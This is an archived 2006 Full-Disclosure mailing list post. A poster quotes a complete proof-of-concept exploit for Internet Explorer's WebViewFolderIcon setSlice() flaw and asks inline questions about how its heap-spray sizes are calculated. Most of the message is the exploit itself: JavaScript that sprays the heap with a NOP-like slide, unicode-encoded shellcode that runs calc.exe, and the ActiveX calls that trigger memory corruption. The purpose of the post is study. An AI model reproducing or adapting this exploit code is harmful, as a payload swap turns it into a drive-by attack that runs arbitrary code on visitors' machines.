lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 20 Nov 2006 18:16:56 +0800
From: ". Solo" <soloaway@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Regarding the heap spray.

Hi all,

I was testing an old exploit --  Internet Explorer WebViewFolderIcon
setSlice() Exploit  http://www.milw0rm.com/exploits/2448
some place I am not really understand:


*Question inline.....*

<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu
Mail: jamikazu@...il.com

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;                              <=====Why the
heapBlockSize set for 0x400000,the base address of IE.
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
<===== the spraySlideSize use for controlling the size of spray, why getting
it through "heapBlockSize - (payLoadSize+0x38)"?

var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
<==heapBlocks is the size of using for fill in the memory, why getting it
through "(heapSprayToAddress - 0x400000)/heapBlockSize"

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

   for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</SCRIPT>

</BODY>
</HTML>

///////////////////////////////////////////////////////

*I am not quite sure whether i describe my question clearly, Thanks for your
helping*

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ